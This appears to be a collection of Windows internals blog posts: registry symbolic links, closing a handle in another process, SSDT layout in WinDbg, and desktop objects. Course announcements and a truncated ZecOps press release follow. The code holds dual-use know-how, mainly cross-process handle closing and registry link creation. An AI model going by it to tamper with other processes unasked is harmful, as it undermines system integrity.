But how to do you create such links yourself? The official Microsoft documentation has partial details on how to do it, and it misses two critical pieces of information to make it work.

Let’s see if we can create a symbolic link. One rule of Registry links, is that the link must point to somewhere within the same hive where the link is created; we can live with that. For demonstration purposes, we’ll create a link in HKEY_CURRENT_USER named DesktopColors that links to HKEY_CURRENT_USER\Control Panel\Desktop\Colors.

The first step is to create the key and specify it to be a link rather than a normal key (error handling omitted):

HKEY hKey;
RegCreateKeyEx(HKEY_CURRENT_USER, L"DesktopColors", 0, nullptr,
	REG_OPTION_CREATE_LINK, KEY_WRITE, nullptr, &hKey, nullptr);

The important part is that REG_OPTION_CREATE_LINK flag that indicates this is supposed to be a link rather than a standard key. The KEY_WRITE access mask is required as well, as we are about to set the link’s target.

Now comes the first tricky part. The documentation states that the link’s target should be written to a value named “SymbolicLinkValue” and it must be an absolute registry path. Sounds easy enough, right? Wrong. The issue here is the “absolute path” – you might think that it should be something like “HKEY_CURRENT_USER\Control Panel\Desktop\Colors” just like we want, but hey – maybe it’s supposed to be “HKCU” instead of “HKEY_CURRENT_USER” – it’s just a string after all.

It turns out both these variants are wrong. The “absolute path” required here is a native Registry path that is not visible in RegEdit.exe, but it is visible in my own Registry editing tool, RegEditX.exe, downloadable from https://github.com/zodiacon/AllTools. Here is a screenshot, showing the “real” Registry vs. the view we get with RegEdit.

This top view is the “real” Registry is seen by the Windows kernel. Notice there is no HKEY_CURRENT_USER, there is a USER key where subkeys exist that represent users on this machine based on their SIDs. These are mostly visible in the standard Registry under the HKEY_USERS hive.

The “absolute path” needed is based on the real view of the Registry. Here is the code that writes the correct path based on my (current user’s) SID:

WCHAR path[] = L"\\REGISTRY\\USER\\S-1-5-21-2575492975-396570422-1775383339-1001\\Control Panel\\Desktop\\Colors";
RegSetValueEx(hKey, L"SymbolicLinkValue", 0, REG_LINK, (const BYTE*)path,
    wcslen(path) * sizeof(WCHAR));

The above code shows the second (undocumented, as far as I can tell) piece of crucial information – the length of the link path (in bytes) must NOT include the NULL terminator. Good luck guessing that 🙂

And that’s it. We can safely close the key and we’re done.

Well, almost. If you try to delete your newly created key using RegEdit.exe – the target is deleted, rather than the link key itself! So, how do you delete the key link? (My RegEditX does not support this yet).

The standard RegDeleteKey and RegDeleteKeyEx APIs are unable to delete a link. Even if they’re given a key handle opened with REG_OPTION_OPEN_LINK – they ignore it and go for the target. The only API that works is the native NtDeleteKey function (from NtDll.Dll).

First, we add the function’s declaration and the NtDll import:

extern "C" int NTAPI NtDeleteKey(HKEY);

#pragma comment(lib, "ntdll")

Now we can delete a link key like so:

HKEY hKey;
RegOpenKeyEx(HKEY_CURRENT_USER, L"DesktopColors", REG_OPTION_OPEN_LINK, 
    DELETE, &hKey);
NtDeleteKey(hKey);

As a final note, RegCreateKeyEx cannot open an existing link key – it can only create one. This in contrast to standard keys that can be created OR opened with RegCreateKeyEx. This means that if you want to change an existing link’s target, you have to call RegOpenKeyEx first (with REG_OPTION_OPEN_LINK) and then make the change (or delete the link key and re-create it).

Isn’t Registry fun?

reglink2

zodiacon

How can I close a handle in another process?

15 March 2020 at 18:24

Many of you are probably familiar with Process Explorer‘s ability to close a handle in any process. How can this be accomplished programmatically?

The standard CloseHandle function can close a handle in the current process only, and most of the time that’s a good thing. But what if you need, for whatever reason, to close a handle in another process?

There are two routes than can be taken here. The first one is using a kernel driver. If this is a viable option, then nothing can prevent you from doing the deed. Process Explorer uses that option, since it has a kernel driver (if launched with admin priveleges at least once). In this post, I will focus on user mode options, some of which are applicable to kernel mode as well.

The first issue to consider is how to locate the handle in question, since its value is unknown in advance. There must be some criteria for which you know how to identify the handle once you stumble upon it. The easiest (and probably most common) case is a handle to a named object.

Let take a concrete example, which I believe is now a classic, Windows Media Player. Regardless of what opnions you may have regarding WMP, it still works. One of it quirks, is that it only allows a single instance of itself to run. This is accomplished by the classic technique of creating a named mutex when WMP comes up, and if it turns out the named mutex already exists (presumabley created by an already existing instance of itself), send a message to its other instance and then exits.

The following screenshot shows the handle in question in a running WMP instance.

wmp1

This provides an opportunity to close that mutex’ handle “behind WMP’s back” and then being able to launch another instance. You can try this by manually closing the handle with Process Explorer and then launch another WMP instance successfully.

If we want to achieve this programmatically, we have to locate the handle first. Unfortunately, the documented Windows API does not provide a way to enumerate handles, not even in the current process. We have to go with the (officially undocumented) Native API if we want to enumerate handles. There two routes we can use:

  1. Enumerate all handles in the system with NtQuerySystemInformation, search for the handle in the PID of WMP.
  2. Enumerate all handles in the WMP process only, searching for the handle yet again.
  3. Inject code into the WMP process to query handles one by one, until found.

Option 3 requires code injection, which can be done by using the CreateRemoteThreadEx function, but requires a DLL that we inject. This technique is very well-known, so I won’t repeat it here. It has the advantage of not requring some of the native APIs we’ll be using shortly.

Options 1 and 2 look very similar, and for our purposes, they are. Option 1 retrieves too much information, so it’s probably better to go with option 2.

Let’s start at the beginning: we need to locate the WMP process. Here is a function to do that, using the Toolhelp API for process enumeration:

#include <windows.h>
#include <TlHelp32.h>
#include <stdio.h>

DWORD FindMediaPlayer() {
	HANDLE hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hSnapshot == INVALID_HANDLE_VALUE)
		return 0;

	PROCESSENTRY32 pe;
	pe.dwSize = sizeof(pe);

	// skip the idle process
	::Process32First(hSnapshot, &pe);
	
	DWORD pid = 0;
	while (::Process32Next(hSnapshot, &pe)) {
		if (::_wcsicmp(pe.szExeFile, L"wmplayer.exe") == 0) {
			// found it!
			pid = pe.th32ProcessID;
			break;
		}
	}
	::CloseHandle(hSnapshot);
	return pid;
}


int main() {
	DWORD pid = FindMediaPlayer();
	if (pid == 0) {
		printf("Failed to locate media player\n");
		return 1;
	}
	printf("Located media player: PID=%u\n", pid);
	return 0;
}

Now that we have located WMP, let’s get all handles in that process. The first step is opening a handle to the process with PROCESS_QUERY_INFORMATION and PROCESS_DUP_HANDLE (we’ll see why that’s needed in a little bit):

HANDLE hProcess = ::OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE,
	FALSE, pid);
if (!hProcess) {
	printf("Failed to open WMP process handle (error=%u)\n",
		::GetLastError());
	return 1;
}

If we can’t open a proper handle, then something is terribly wrong. Maybe WMP closed in the meantime?

Now we need to work with the native API to query the handles in the WMP process. We’ll have to bring in some definitions, which you can find in the excellent phnt project on Github (I added extern "C" declaration because we use a C++ file).

#include <memory>

#pragma comment(lib, "ntdll")

#define NT_SUCCESS(status) (status >= 0)

#define STATUS_INFO_LENGTH_MISMATCH      ((NTSTATUS)0xC0000004L)

enum PROCESSINFOCLASS {
	ProcessHandleInformation = 51
};

typedef struct _PROCESS_HANDLE_TABLE_ENTRY_INFO {
	HANDLE HandleValue;
	ULONG_PTR HandleCount;
	ULONG_PTR PointerCount;
	ULONG GrantedAccess;
	ULONG ObjectTypeIndex;
	ULONG HandleAttributes;
	ULONG Reserved;
} PROCESS_HANDLE_TABLE_ENTRY_INFO, * PPROCESS_HANDLE_TABLE_ENTRY_INFO;

// private
typedef struct _PROCESS_HANDLE_SNAPSHOT_INFORMATION {
	ULONG_PTR NumberOfHandles;
	ULONG_PTR Reserved;
	PROCESS_HANDLE_TABLE_ENTRY_INFO Handles[1];
} PROCESS_HANDLE_SNAPSHOT_INFORMATION, * PPROCESS_HANDLE_SNAPSHOT_INFORMATION;

extern "C" NTSTATUS NTAPI NtQueryInformationProcess(
	_In_ HANDLE ProcessHandle,
	_In_ PROCESSINFOCLASS ProcessInformationClass,
	_Out_writes_bytes_(ProcessInformationLength) PVOID ProcessInformation,
	_In_ ULONG ProcessInformationLength,
	_Out_opt_ PULONG ReturnLength);

The #include <memory> is for using unique_ptr<> as we’ll do soon enough. The #parma links the NTDLL import library so that we don’t get an “unresolved external” when calling NtQueryInformationProcess. Some people prefer getting the functions address with GetProcAddress so that linking with the import library is not necessary. I think using GetProcAddress is important when using a function that may not exist on the system it’s running on, otherwise the process will crash at startup, when the loader (code inside NTDLL.dll) tries to locate a function. It does not care if we check dynamically whether to use the function or not – it will crash. Using GetProcAddress will just fail and the code can handle it. In our case, NtQueryInformationProcess existed since the first Windows NT version, so I chose to go with the simplest route.

Our next step is to enumerate the handles with the process information class I plucked from the full list in the phnt project (ntpsapi.h file):

ULONG size = 1 << 10;
std::unique_ptr<BYTE[]> buffer;
for (;;) {
	buffer = std::make_unique<BYTE[]>(size);
	auto status = ::NtQueryInformationProcess(hProcess, ProcessHandleInformation, 
		buffer.get(), size, &size);
	if (NT_SUCCESS(status))
		break;
	if (status == STATUS_INFO_LENGTH_MISMATCH) {
		size += 1 << 10;
		continue;
	}
	printf("Error enumerating handles\n");
	return 1;
}

The Query* style functions in the native API request a buffer and return STATUS_INFO_LENGTH_MISMATCH if it’s not large enough or not of the correct size. The code allocates a buffer with make_unique<BYTE[]> and tries its luck. If the buffer is not large enough, it receives back the required size and then reallocates the buffer before making another call.

Now we need to step through the handles, looking for our mutex. The information returned from each handle does not include the object’s name, which means we have to make yet another native API call, this time to NtQyeryObject along with some extra required definitions:

typedef enum _OBJECT_INFORMATION_CLASS {
	ObjectNameInformation = 1
} OBJECT_INFORMATION_CLASS;

typedef struct _UNICODE_STRING {
	USHORT Length;
	USHORT MaximumLength;
	PWSTR  Buffer;
} UNICODE_STRING;

typedef struct _OBJECT_NAME_INFORMATION {
	UNICODE_STRING Name;
} OBJECT_NAME_INFORMATION, * POBJECT_NAME_INFORMATION;

extern "C" NTSTATUS NTAPI NtQueryObject(
	_In_opt_ HANDLE Handle,
	_In_ OBJECT_INFORMATION_CLASS ObjectInformationClass,
	_Out_writes_bytes_opt_(ObjectInformationLength) PVOID ObjectInformation,
	_In_ ULONG ObjectInformationLength,
	_Out_opt_ PULONG ReturnLength);

NtQueryObject has several information classes, but we only need the name. But what handle do we provide NtQueryObject? If we were going with option 3 above and inject code into WMP’s process, we could loop with handle values starting from 4 (the first legal handle) and incrementing the loop handle by four.

Here we are in an external process, so handing out the handles provided by NtQueryInformationProcess does not make sense. What we have to do is duplicate each handle into our own process, and then make the call. First, we set up a loop for all handles and duplicate each one:

auto info = reinterpret_cast<PROCESS_HANDLE_SNAPSHOT_INFORMATION*>(buffer.get());
for (ULONG i = 0; i < info->NumberOfHandles; i++) {
	HANDLE h = info->Handles[i].HandleValue;
	HANDLE hTarget;
	if (!::DuplicateHandle(hProcess, h, ::GetCurrentProcess(), &hTarget, 
		0, FALSE, DUPLICATE_SAME_ACCESS))
		continue;	// move to next handle
	}

We duplicate the handle from WMP’s process (hProcess) to our own process. This function requires the handle to the process opened with PROCESS_DUP_HANDLE.

Now for the name: we need to call NtQueryObject with our duplicated handle and buffer that should be filled with UNICODE_STRING and whatever characters make up the name.

BYTE nameBuffer[1 << 10];
auto status = ::NtQueryObject(hTarget, ObjectNameInformation, 
	nameBuffer, sizeof(nameBuffer), nullptr);
::CloseHandle(hTarget);
if (!NT_SUCCESS(status))
	continue;

Once we query for the name, the handle is not needed and can be closed, so we don’t leak handles in our own process. Next, we need to locate the name and compare it with our target name. But what is the target name? We see in Process Explorer how the name looks. It contains the prefix used by any process (except UWP processes): “\Sessions\<session>\BasedNameObjects\<thename>”. We need the session ID and the “real” name to build our target name:

WCHAR targetName[256];
DWORD sessionId;
::ProcessIdToSessionId(pid, &sessionId);
::swprintf_s(targetName,
	L"\\Sessions\\%u\\BaseNamedObjects\\Microsoft_WMP_70_CheckForOtherInstanceMutex", 
	sessionId);
auto len = ::wcslen(targetName);

This code should come before the loop begins, as we only need to build it once.

Not for the real comparison of names:

auto name = reinterpret_cast<UNICODE_STRING*>(nameBuffer);
if (name->Buffer && 
	::_wcsnicmp(name->Buffer, targetName, len) == 0) {
	// found it!
}

The name buffer is cast to a UNICODE_STRING, which is the standard string type in the native API (and the kernel). It has a Length member which is in bytes (not characters) and does not have to be NULL-terminated. This is why the function used is _wcsnicmp, which can be limited in its search for a match.

Assuming we find our handle, what do we do with it? Fortunately, there is a trick we can use that allows closing a handle in another process: call DuplicateHandle again, but add the DUPLICATE_CLOSE_SOURCE to close the source handle. Then close our own copy, and that’s it! The mutex is gone. Let’s do it:

// found it!
::DuplicateHandle(hProcess, h, ::GetCurrentProcess(), &hTarget,
	0, FALSE, DUPLICATE_CLOSE_SOURCE);
::CloseHandle(hTarget);
printf("Found it! and closed it!\n");
return 0;

This is it. If we get out of the loop, it means we failed to locate the handle with that name. The general technique of duplicating a handle and closing the source is applicable to kernel mode as well. It does require a process handle with PROCESS_DUP_HANDLE to make it work, which is not always possible to get from user mode. For example, protected and PPL (protected processes light) processes cannot be opened with this access mask, even by administrators. In kernel mode, on the other hand, any process can be opened with full access.

wmp1

💾

zodiacon

💾

Next Windows Internals (Remote) Training

3 January 2020 at 18:47

It’s been a while since I gave the Windows Internals training, so it’s time for another class of my favorite topics!

This time I decided to make it more afordable, to allow more people to participate. The cost is based on whether paid by an individual vs. a company. The training includes lab exercises – some involve working with tools, while others involve coding in C/C++.

  • Public 5-day remote class
  • Dates: April 20, 22, 23, 27, 30
  • Time: 8 hours / day. Exact hours TBD
  • Price: 750 USD (payed by individual) / 1500 USD (payed by company)
  • Register by emailing [email protected] and specifying “Windows Internals Training” in the title
    • Provide names of participants (discount available for multiple participants from the same company), company name (if any) and preferred time zone.
    • You’ll receive instructions for payment and other details
  • Virtual space is limited!

The training time zone will be finalized closer to the start date.

Objectives: Understand the Windows system architectureExplore the internal workings of process, threads, jobs, virtual memory, the I/O system and other mechanisms fundamental to the way Windows works

Write a simple software device driver to access/modify information not available from user mode

Target Audience: Experienced windows programmers in user mode or kernel mode, interested in writing better programs, by getting a deeper understanding of the internal mechanisms of the windows operating system.Security researchers interested in gaining a deeper understanding of Windows mechanisms (security or otherwise), allowing for more productive research
Pre-Requisites: Basic knowledge of OS concepts and architecture.Power user level working with Windows

Practical experience developing windows applications is an advantage

C/C++ knowledge is an advantage

  • Module 1: System Architecture
    • Brief Windows NT History
    • Windows Versions
    • Tools: Windows, Sysinternals, Debugging Tools for Windows
    • Processes and Threads
    • Virtual Memory
    • User mode vs. Kernel mode
    • Architecture Overview
    • Key Components
    • User/kernel transitions
    • APIs: Win32, Native, .NET, COM, WinRT
    • Objects and Handles
    • Sessions
    • Introduction to WinDbg
    • Lab: Task manager, Process Explorer, WinDbg
  • Module 2: Processes & Jobs
    • Process basics
    • Creating and terminating processes
    • Process Internals & Data Structures
    • The Loader
    • DLL explicit and implicit linking
    • Process and thread attributes
    • Protected processes and PPL
    • UWP Processes
    • Minimal and Pico processes
    • Jobs
    • Nested jobs
    • Introduction to Silos
    • Server Silos and Docker
    • Lab: viewing process and job information; creating processes; setting job limits
  • Module 3: Threads
    • Thread basics
    • Thread Internals & Data Structures
    • Creating and terminating threads
    • Thread Stacks
    • Thread Priorities
    • Thread Scheduling
    • CPU Sets
    • Direct Switch
    • Deep Freeze
    • Thread Synchronization
    • Lab: creating threads; thread synchronization; viewing thread information; CPU sets
  • Module 4: Kernel Mechanisms
    • Trap Dispatching
    • Interrupts
    • Interrupt Request Level (IRQL)
    • Deferred Procedure Calls (DPCs)
    • Exceptions
    • System Crash
    • Object Management
    • Objects and Handles
    • Sharing Objects
    • Thread Synchronization
    • Synchronization Primitives (Mutex, Semaphore, Events, and more)
    • Signaled vs. Non-Signaled
    • High IRQL Synchronization
    • Windows Global Flags
    • Kernel Event Tracing
    • Wow64
    • Lab: Viewing Handles, Interrupts; creating maximum handles; Thread synchronization
  • Module 5: Memory Management
    • Overview
    • Small, large and huge pages
    • Page states
    • Memory Counters
    • Address Space Layout
    • Address Translation Mechanisms
    • Heaps
    • APIs in User mode and Kernel mode
    • Page Faults
    • Page Files
    • Commit Size and Commit Limit
    • Workings Sets
    • Memory Mapped Files (Sections)
    • Page Frame Database
    • Other memory management features
    • Lab: committing & reserving memory; using shared memory; viewing memory related information
  • Module 6: Management Mechanisms
    • The Registry
    • Services
    • Starting and controlling services
    • Windows Management Instrumentation
    • Lab: Viewing and configuring services; Process Monitor

  • Module 7: I/O System
    • I/O System overview
    • Device Drivers
    • Plug & Play
    • The Windows Driver Model (WDM)
    • The Windows Driver Framework (WDF)
    • WDF: KMDF and UMDF
    • Device and Driver Objects
    • I/O Processing and Data Flow
    • IRPs
    • Power Management
    • Driver Verifier
    • Writing a Software Driver
    • Labs: viewing driver and device information; writing a software driver
  • Module 8: Security
    • Security Components
    • Virtualization Based Security
    • Hyper-V
    • Protecting objects
    • SIDs
    • User Access Control (UAC)
    • Tokens
    • Integrity Levels
    • ACLs
    • Privileges
    • Access checks
    • AppContainers
    • Logon
    • Control Flow Guard (CFG)
    • Process mitigations
    • Lab: viewing security information

zodiacon

💾

Where did System Services 0 and 1 go?

13 November 2019 at 16:53

System calls on Windows go through NTDLL.dll, where each system call is invoked by a syscall (x64) or sysenter (x86) CPU instruction, as can be seen from the following output of NtCreateFile from NTDLL:

0:000> u
ntdll!NtCreateFile:
00007ffc`c07fcb50 4c8bd1          mov     r10,rcx
00007ffc`c07fcb53 b855000000      mov     eax,55h
00007ffc`c07fcb58 f604250803fe7f01 test    byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
00007ffc`c07fcb60 7503            jne     ntdll!NtCreateFile+0x15 (00007ffc`c07fcb65)
00007ffc`c07fcb62 0f05            syscall
00007ffc`c07fcb64 c3              ret
00007ffc`c07fcb65 cd2e            int     2Eh
00007ffc`c07fcb67 c3              ret

The important instructions are marked in bold. The value set to EAX is the system service number (0x55 in this case). The syscall instruction follows (the condition tested does not normally cause a branch). syscall causes transition to the kernel into the System Service Dispatcher routine, which is responsible for dispatching to the real system call implementation within the Executive. I will not go to the exact details here, but eventually, the EAX register must be used as a lookup index into the System Service Dispatch Table (SSDT), where each system service number (index) should point to the actual routine.

On x64 versions of Windows, the SSDT is available in the kernel debugger in the nt!KiServiceTable symbol:

lkd> dd nt!KiServiceTable
fffff804`13c3ec20  fced7204 fcf77b00 02b94a02 04747400
fffff804`13c3ec30  01cef300 fda01f00 01c06005 01c3b506
fffff804`13c3ec40  02218b05 0289df01 028bd600 01a98d00
fffff804`13c3ec50  01e31b00 01c2a200 028b7200 01cca500
fffff804`13c3ec60  02229b01 01bf9901 0296d100 01fea002

You might expect the values in the SSDT to be 64-bit pointers, pointing directly to the system services (this is the scheme used on x86 systems). On x64 the values are 32 bit, and are used as offsets from the start of the SSDT itself. However, the offset does not include the last hex digit (4 bits): this last value is the number of arguments to the system call.

Let’s see if this holds with NtCreateFile. Its service number is 0x55 as we’ve seen from user mode, so to get to the actual offset, we need to perform a simple calculation:

kd> dd nt!KiServiceTable+55*4 L1
fffff804`13c3ed74  020b9207

Now we need to take this offset (without the last hex digit), add it to the SSDT and this should point at NtCreateFile:

lkd> u nt!KiServiceTable+020b920
nt!NtCreateFile:
fffff804`13e4a540 4881ec88000000  sub     rsp,88h
fffff804`13e4a547 33c0            xor     eax,eax
fffff804`13e4a549 4889442478      mov     qword ptr [rsp+78h],rax
fffff804`13e4a54e c744247020000000 mov     dword ptr [rsp+70h],20h

Indeed – this is NtCreateFile. What about the argument count? The value stored is 7. Here is the prototype of NtCreateFile (documented in the WDK as ZwCreateFile):

NTSTATUS NtCreateFile(
  PHANDLE            FileHandle,
  ACCESS_MASK        DesiredAccess,
  POBJECT_ATTRIBUTES ObjectAttributes,
  PIO_STATUS_BLOCK   IoStatusBlock,
  PLARGE_INTEGER     AllocationSize,
  ULONG              FileAttributes,
  ULONG              ShareAccess,
  ULONG              CreateDisposition,
  ULONG              CreateOptions,
  PVOID              EaBuffer,
  ULONG              EaLength);

Clearly, there are 11 parameters, not just 7. Why the discrepency? The stored value is the number of parameters that are passed using the stack. In x64 calling convention, the first 4 arguments are passed using registers: RCX, RDX, R8, R9 (in this order).

Now back to the title of this post. Here are the first few entries in the SSDT again:

lkd> dd nt!KiServiceTable
fffff804`13c3ec20  fced7204 fcf77b00 02b94a02 04747400
fffff804`13c3ec30  01cef300 fda01f00 01c06005 01c3b506

The first two entries look different, with much larger numbers. Let’s try to apply the same logic for the first value (index 0):

kd> u nt!KiServiceTable+fced720
fffff804`2392c340 ??              ???
                    ^ Memory access error in 'u nt!KiServiceTable+fced720'

Clearly a bust. The value is in fact a negative value (in two’s complement), so we need to sign-extend it to 64 bit, and then perform the addition (leaving out the last hex digit as before):

kd> u nt!KiServiceTable+ffffffff`ffced720
nt!NtAccessCheck:
fffff804`1392c340 4c8bdc          mov     r11,rsp
fffff804`1392c343 4883ec68        sub     rsp,68h
fffff804`1392c347 488b8424a8000000 mov     rax,qword ptr [rsp+0A8h]

This is NtAccessCheck. The function’s implementation is in lower addresses than the SSDT itself. Let’s try the same exercise with index 1:

kd> u nt!KiServiceTable+ffffffff`ffcf77b0
nt!NtWorkerFactoryWorkerReady:
fffff804`139363d0 4c8bdc          mov     r11,rsp
fffff804`139363d3 49895b08        mov     qword ptr [r11+8],rbx

And we get system call number 1: NtWorkerFactoryWorkerReady.

For those fond of WinDbg scripting – write a script to display nicely all system call functions and their indices.

 

zodiacon

💾

Windows 10 Desktops vs. Sysinternals Desktops

17 February 2019 at 09:19

One of the new Windows 10 features visible to users is the support for additional “Desktops”. It’s now possible to create additional surfaces on which windows can be used. This idea is not new – it has been around in the Linux world for many years (e.g. KDE, Gnome), where users have 4 virtual desktops they can use. The idea is that to prevent clutter, one desktop can be used for web browsing, for example, and another desktop can be used for all dev work, and yet a third desktop could be used for all social / work apps (outlook, WhatsApp, Facebook, whatever).

To create an additional virtual desktop on Windows 10, click on the Task View button on the task bar, and then click the “New Desktop” button marked with a plus sign.

newvirtualdesktop

Now you can switch between desktops by clicking the appropriate desktop button and then launch apps as usual. It’s even possible (by clicking Task View again) to move windows from desktop to desktop, or to request that a window be visible on all desktops.

The Sysinternals tools had a tool called “Desktops” for many years now. It too allows for creation of up to 4 desktops where applications can be launched. The question is – is this Desktops tool the same as the Windows 10 virtual desktops feature? Not quite.

First, some background information. In the kernel object hierarchy under a session object, there are window stations, desktops and other objects. Here’s a diagram summarizing this tree-like relationship:

Sessions

As can be seen in the diagram, a session contains a set of Window Stations. One window station can be interactive, meaning it can receive user input, and is always called winsta0. If there are other window stations, they are non-interactive.

Each window station contains a set of desktops. Each of these desktops can hold windows. So at any given moment, an interactive user can interact with a single desktop under winsta0. Upon logging in, a desktop called “Default” is created and this is where all the normal windows appear. If you click Ctrl+Alt+Del for example, you’ll be transferred to another desktop, called “Winlogon”, that was created by the winlogon process. That’s why your normal windows “disappear” – you have been switched to another desktop where different windows may exist. This switching is done by a documented function – SwitchDesktop.

And here lies the difference between the Windows 10 virtual desktops and the Sysinternals desktops tool. The desktops tool actually creates desktop objects using the CreateDesktop API. In that desktop, it launches Explorer.exe so that a taskbar is created on that desktop – initially the desktop has nothing on it. How can desktops launch a process that by default creates windows in a different desktop? This is possible to do with the normal CreateProcess function by specifying the desktop name in the STARTUPINFO structure’s lpDesktop member. The format is “windowstation\desktop”. So in the desktops tool case, that’s something like “winsta0\Sysinternals Desktop 1”. How do I know the name of the Sysinternals desktop objects? Desktops can be enumerated with the EnumDesktops API. I’ve written a small tool, that enumerates window stations and desktops in the current session. Here’s a sample output when one additional desktop has been created with “desktops”:

desktops1

In the Windows 10 virtual desktops feature, no new desktops are ever created. Win32k.sys just manipulates the visibility of windows and that’s it. Can you guess why? Why doesn’t Window 10 use the CreateDesktop/SwitchDesktop APIs for its virtual desktop feature?

The reason has to do with some limitations that exist on desktop objects. For one, a window (technically a thread) that is bound to a desktop cannot be switched to another; in other words, there is no way to transfer a windows from one desktop to another. This is intentional, because desktops provide some protection. For example, hooks set with SetWindowsHookEx can only be set on the current desktop, so cannot affect other windows in other desktops. The Winlogon desktop, as another example, has a strict security descriptor that prevents non system-level users from accessing that desktop. Otherwise, that desktop could have been tampered with.

The virtual desktops in Windows 10 is not intended for security purposes, but for flexibility and convenience (security always “contradicts” convenience). That’s why it’s possible to move windows between desktops, because there is no real “moving” going on at all. From the kernel’s perspective, everything is still on the same “Default” desktop.

 

 

 

zodiacon

💾

newvirtualdesktop

💾

Sessions

💾

desktops1

💾

Next Windows Kernel Programming Remote Class

15 February 2019 at 14:53

The next public remote Windows kernel Programming class I will be delivering is scheduled for April 15 to 18. It’s going to be very similar to the first one I did at the end of January (with some slight modifications and additions).

Cost: 1950 USD. Early bird (register before March 30th): 1650 USD

I have not yet finalized the time zone the class will be “targeting”. I will update in a few weeks on that.

If you’re interested in registering, please email [email protected] with the subject “Windows Kernel Programming class” and specify your name, company (if any) and time zone. I’ll reply by providing more information.

Feel free to contact me for questions using the email or through twitter (@zodiacon).

The complete syllabus is outlined below:

Duration: 4 Days
Target Audience: Experienced windows developers, interested in developing kernel mode drivers
Objectives: ·  Understand the Windows kernel driver programming model

·  Write drivers for monitoring processes, threads, registry and some types of objects

·  Use documented kernel hooking mechanisms

·  Write basic file system mini-filter drivers

Pre Requisites: ·  At least 2 years of experience working with the Windows API

·  Basic understanding of Windows OS concepts such as processes, threads, virtual memory and DLLs

Software requirements: ·  Windows 10 Pro 64 bit (latest stable version)
·  Visual Studio 2017 + latest update
·  Windows 10 SDK (latest)
·  Windows 10 WDK (latest)
·  Virtual Machine for testing and debugging

Instructor: Pavel Yosifovich

Abstract

The cyber security industry has grown considerably in recent years, with more sophisticated attacks and consequently more defenders. To have a fighting chance against these kinds of attacks, kernel mode drivers must be employed, where nothing (at least nothing from user mode) can escape their eyes.
The course provides the foundations for the most common software device drivers that are useful not just in cyber security, but also other scenarios, where monitoring and sometimes prevention of operations is required. Participants will write real device drivers with useful features they can then modify and adapt to their particular needs.

Syllabus

  • Module 1: Windows Internals quick overview
    • Processes
    • Virtual memory
    • Threads
    • System architecture
    • User / kernel transitions
    • Introduction to WinDbg
    • Windows APIs
    • Objects and handles
    • Summary

 

  • Module 2: The I/O System
    • I/O System overview
    • Device Drivers
    • The Windows Driver Model (WDM)
    • The Kernel Mode Driver Framework (KMDF)
    • Other device driver models
    • Driver types
    • Software drivers
    • Driver and device objects
    • I/O Processing and Data Flow
    • Accessing devices
    • Asynchronous I/O
    • Summary

 

  • Module 3: Kernel programming basics
    • Setting up for Kernel Development
    • Basic Kernel types and conventions
    • C++ in a kernel driver
    • Creating a driver project
    • Building and deploying
    • The kernel API
    • Strings
    • Linked Lists
    • The DriverEntry function
    • The Unload routine
    • Installation
    • Testing
    • Debugging
    • Summary
    • Lab: deploy a driver

 

  • Module 4: Building a simple driver
    • Creating a device object
    • Exporting a device name
    • Building a driver client
    • Driver dispatch routines
    • Introduction to I/O Request Packets (IRPs)
    • Completing IRPs
    • Handling DeviceIoControl calls
    • Testing the driver
    • Debugging the driver
    • Using WinDbg with a virtual machine
    • Summary
    • Lab: open a process for any access; zero driver; debug a driver

 

  • Module 5: Kernel mechanisms
    • Interrupt Request Levels (IRQLs)
    • Deferred Procedure Calls (DPCs)
    • Dispatcher objects
    • Low IRQL Synchronization
    • Spin locks
    • Work items
    • Summary

 

  • Module 6: Process and thread monitoring
    • Motivation
    • Process creation/destruction callback
    • Specifying process creation status
    • Thread creation/destruction callback
    • Notifying user mode
    • Writing a user mode client
    • Preventing potentially malicious processes from executing
    • Summary
    • Lab: monitoring process/thread activity; prevent specific processes from running; protecting processes

 

  • Module 7: Object and registry notifications
    • Process/thread object notifications
    • Pre and post callbacks
    • Registry notifications
    • Performance considerations
    • Reporting results to user mode
    • Summary
    • Lab: protect specific process from termination; simple registry monitor

 

  • Module 8: File system mini filters
    • File system model
    • Filters vs. mini filters
    • The Filter Manager
    • Filter registration
    • Pre and Post callbacks
    • File name information
    • Contexts
    • File system operations
    • Filter to user mode communication
    • Debugging mini-filters
    • Summary
    • Labs: protect a directory from file deletion; backup file before deletion

zodiacon

💾

ZecOps Announces The Formation of Defense Advisory Board and Appoints Former Commander of Unit 8200 Ehud Scneorson as Chairman

6 April 2021 at 13:45
ZecOps Announces The Formation of Defense Advisory Board and Appoints Former Commander of Unit 8200 Ehud Scneorson as Chairman

Ehud Schneourson to provide cyberdefense expertise and tactical guidance to burgeoning mobile security startup, with additional appointments to be announced in the coming months

SAN FRANCISCO, April 1st, 2021 — ZecOps, the world’s most powerful platform to discover and analyze mobile cyber attacks, announced the formation of its international Defense Advisory Board. Ehud Schneourson, (ret.) Brigadier General and commander of Israel’s elite Unit 8200, was appointed as Chairman.

“It takes a submarine to discover other submarines, and ZecOps is the submarine we were all waiting for in the mobile security space.” said Ehud Schneourson. “Attackers used to care only about Google and Apple, but ZecOps created an entire category of problems for attackers. I’m thrilled to partner with ZecOps in their mission to protect our most sensitive assets, our mobile devices.”

“ZecOps is a true mobile EDR that is technically non-existent in the market today”, Schneourson summarized.

ZecOps’ success in the public and private sectors has been bolstered by the discovery of several advanced attacks. These include a “0-click” vulnerability on the default iOS Mail app, attacks on journalists in the Middle East, and others. 

ZecOps estimates that there are hundreds of sophisticated organizations targeting mobile devices, many of whom sell their exploits on the black market. This claim is supported by ZecOps Mobile Threat Intelligence, which has shown a rapid increase in the number of mobile cyberattacks in the past year.

“The number of attacks that we have discovered on mobile devices is mind blowing. I can’t wait to see what else we’ll discover in the years to come,” said Zuk Avraham, co-founder and CEO of ZecOps. “Mobile devices have become our ‘single factor of authentication’, and the most desirable target for attackers. Our Defense Advisory Board understands and appreciates the creativity needed to establish proper mobile cyberdefense. I’m thrilled to bring Ehud onboard, and am excited to partner with him and the world’s defense leaders”.

About ZecOps:

